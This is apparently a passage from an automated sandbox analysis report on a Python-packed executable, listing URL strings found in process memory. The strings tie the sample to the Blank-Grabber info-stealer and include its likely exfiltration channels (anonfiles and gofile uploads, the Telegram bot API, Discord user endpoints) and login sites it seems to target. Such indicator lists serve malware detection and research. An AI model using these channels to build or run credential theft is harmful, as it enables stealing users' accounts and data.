00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Resource.exe, 00000001.00000002.2475852502.0000020AB419C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000044.00000002.2349979588.000001B7ED6DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwCerAut_206-23.crt0
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3D10000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2036471836.0000020AB3CF2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: Resource.exe, 00000001.00000002.2473117545.0000020AB3BAC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031700658.0000020AB3BB4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: powershell.exe, 0000000E.00000002.2278599707.000001CEDBD4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft00~1.5.JSOy.
Source: Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft100~1.5.PBy.
Source: Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftOWNLO~1.TXTy.
Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftZXCVBN~1DB-y.
Source: Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: Resource.exe, 00000001.00000003.2360929970.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205878951.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~r
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: Resource.exe, 00000001.00000003.2033270433.0000020AB37F2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: Resource.exe, 00000001.00000003.2024701640.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://en.wikipedi
Source: Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
Source: Resource.exe, 00000001.00000003.2030164549.0000020AB38C8000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030015652.0000020AB38EC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030430138.0000020AB392B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030064983.0000020AB388D000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029783273.0000020AB3EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: Resource.exe, 00000001.00000002.2472003336.0000020AB3168000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: Resource.exe, 00000001.00000003.2033438155.0000020AB3883000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033114916.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033504916.0000020AB3CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: Resource.exe, 00000001.00000002.2472629307.0000020AB3932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D67F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: Resource.exe, 00000001.00000002.2473117545.0000020AB3BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: Resource.exe, 00000001.00000003.2034221177.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033518977.0000020AB3976000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB3976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: Resource.exe, 00000001.00000002.2472230674.0000020AB33C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2196747987.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190835333.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
